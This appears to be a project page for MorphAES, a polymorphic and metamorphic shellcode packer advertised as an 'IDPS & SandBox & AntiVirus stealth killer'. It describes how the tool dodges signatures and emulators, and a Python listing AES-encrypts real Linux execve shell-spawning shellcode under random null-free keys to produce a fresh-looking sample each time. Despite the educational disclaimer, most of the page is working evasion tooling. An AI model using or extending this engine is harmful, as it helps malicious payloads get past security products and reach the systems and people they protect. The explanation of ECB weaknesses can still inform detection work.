MorphAES - IDPS & SandBox & AntiVirus STEALTH KILLER.

This post is intended to help readers understand and learn how encryption is used in malware. We don't expect it to be used in malware "in practice"; creating malware would be illegal. Moreover, this post is not "practical", since it provides neither a way to ensure file erasure nor a way to pay for and communicate keys.

MorphAES is the world's first polymorphic shellcode/malware engine with metamorphic properties and sandbox-bypass capability, which together are meant to make a payload undetectable by an IDPS; it is cross-platform and library-independent as well.
+ Polymorphism (AES encryption: every generated sample carries the same shellcode under a different random key)
+ Metamorphism (logic and constants changing)
+ Platform independent (Linux/BSD/Windows)
+ IDPS stealthing (for one given code there are 2^128 possible ciphertexts, one per AES-128 key, multiplied by the metamorphic variants of the stub, so enumerating signatures for the payload is infeasible)
+ Sandbox evasion (special assembly instructions: the decryption stub depends on AES-NI, so a sandbox or emulator that does not implement those instructions cannot run the payload to the point where it could be observed)
+ Realism (no null bytes)
+ Can produce executables (malware)

Dependencies for the morpher:
– Python 2.7 – main engine
– Python Crypto 2.6 – for encryption
Dependencies for the code execution:
– Intel AES-NI – for decryption

Nonetheless, there are some limitations (aka white-hat aspects):
* Shellcode's maximum length is 240 bytes (I don't really want to destroy the whole industry (at least for now), but if you're good at assembly and crypto, it's technically possible to extend it)
* Execution might lead to unexpected results if you use 8-bit registers (I'm not really sure why or how)
* Metamorphism is not very robust and can be detected using regular expressions (but it can be improved pretty easily)
* Unicode null bytes might still work (but who cares?)
* It will surely work on 64-bit Intel processors with AES-NI support; since nearly all current user CPUs (like Pentium, Celeron, i3, i5, i7) and industry servers (like Xeon) have it, it's more a specification than a limitation. Do check for the `aes` flag in /proc/cpuinfo (Linux) before relying on it: older or low-end parts without AES-NI raise an illegal-instruction fault on the decryption stub instead of running the payload.
* Windows/BSD PoC and executables are in progress…

How it works
+ Shellcode padding with NOPs (since AES is a block cipher, the payload must be a multiple of 16 bytes; NOPs pad it out without changing what it does)
+ Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) – polymorphism. ECB is acceptable here because the goal is signature diversity rather than confidentiality: the key ships inside the decryption stub, so the payload is hidden from static signatures, not from an analyst who runs or decrypts the sample. ECB's one practical weakness for this use is that identical 16-byte plaintext blocks (for example long NOP runs) produce identical ciphertext blocks within a sample, which a detector can look for.
+ Constants randomization & logic changes – metamorphism
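The padding and encryption steps above, as an added Python 3 example that is not MorphAES's own code (the engine itself is Python 2.7 with PyCrypto): the shellcode is NOP-padded to the AES block size, encrypted under a fresh random key with AES-128-ECB, and the key is re-rolled until neither the key nor the ciphertext contains a null byte, which is how the "no null bytes" property can be met. AES is implemented in pure Python so the example runs without PyCrypto and is checked against the FIPS-197 test vector. The 0x90 NOP byte, appending the padding after the payload, and the 240-byte limit are assumptions taken from the README's x86 context; the sample shellcode is the widely published 23-byte Linux x86-64 execve("/bin//sh") sequence, used only as input bytes and never executed.

```python
import os

def _build_sbox():
    # Walk the nonzero elements of GF(2^8) keeping p*q == 1 (p multiplied by 3,
    # q divided by 3 each step), then apply the AES affine map to q.
    sbox = [0] * 256
    p = q = 1
    while True:
        p = p ^ ((p << 1) & 0xFF) ^ (0x1B if p & 0x80 else 0)
        q = (q ^ (q << 1)) & 0xFF
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)   # sum of rotations
        sbox[p] = (x ^ (x >> 8) ^ 0x63) & 0xFF              # fold and add 0x63
        if p == 1:
            break
    sbox[0] = 0x63  # zero has no multiplicative inverse
    return sbox

SBOX = _build_sbox()

def _xtime(b):
    # multiply by 2 in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1
    return ((b << 1) ^ 0x1B) & 0xFF if b & 0x80 else b << 1

def _expand_key(key):
    # AES-128 key schedule: 44 words, returned as 11 round keys of 16 bytes
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1]
        if i % 4 == 0:  # RotWord + SubWord + Rcon on every fourth word
            t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[r * 4:r * 4 + 4], []) for r in range(11)]

def _encrypt_block(round_keys, block):
    # State is kept column-major, i.e. in the same order as the input bytes.
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                               # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]     # ShiftRows
        if rnd < 10:                                           # MixColumns
            m = []
            for c in range(0, 16, 4):
                a0, a1, a2, a3 = s[c:c + 4]
                m += [_xtime(a0) ^ _xtime(a1) ^ a1 ^ a2 ^ a3,
                      a0 ^ _xtime(a1) ^ _xtime(a2) ^ a2 ^ a3,
                      a0 ^ a1 ^ _xtime(a2) ^ _xtime(a3) ^ a3,
                      _xtime(a0) ^ a0 ^ a1 ^ a2 ^ _xtime(a3)]
            s = m
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]        # AddRoundKey
    return bytes(s)

def aes128_ecb_encrypt(key, data):
    # ECB: each 16-byte block is encrypted independently under the same key
    rk = _expand_key(key)
    return b"".join(_encrypt_block(rk, data[i:i + 16])
                    for i in range(0, len(data), 16))

NOP = 0x90            # x86 NOP; assumption, the README does not name the pad byte
MAX_SHELLCODE = 240   # limit stated in the README

# Widely published 23-byte Linux x86-64 execve("/bin//sh") shellcode, used
# here only as sample input bytes; nothing in this file executes it.
SAMPLE_SHELLCODE = bytes.fromhex(
    "4831f65648bf2f62696e2f2f736857545f6a3b58990f05")

def pad_with_nops(shellcode):
    # AES is a block cipher: round the payload up to a 16-byte multiple with
    # NOPs (appended here; whether MorphAES pads before or after is assumed)
    if len(shellcode) > MAX_SHELLCODE:
        raise ValueError("shellcode longer than %d bytes" % MAX_SHELLCODE)
    return shellcode + bytes([NOP]) * (-len(shellcode) % 16)

def morph(shellcode, rng=os.urandom, max_tries=10000):
    """Return (key, ciphertext) for one polymorphic sample.

    The key is re-rolled until neither it nor the ciphertext contains a null
    byte, since both get embedded in the stub. Even at the 240-byte maximum
    (256 bytes to keep null-free) roughly one draw in three succeeds.
    """
    padded = pad_with_nops(shellcode)
    for _ in range(max_tries):
        key = rng(16)
        ct = aes128_ecb_encrypt(key, padded)
        if 0 not in key and 0 not in ct:
            return key, ct
    raise RuntimeError("no null-free key/ciphertext pair found")
```

Calling `morph(SAMPLE_SHELLCODE)` twice yields two samples with the same plaintext and entirely different bytes, which is the polymorphism the page describes; encrypting two identical blocks under one key with `aes128_ecb_encrypt` shows the ECB caveat (identical ciphertext blocks) directly.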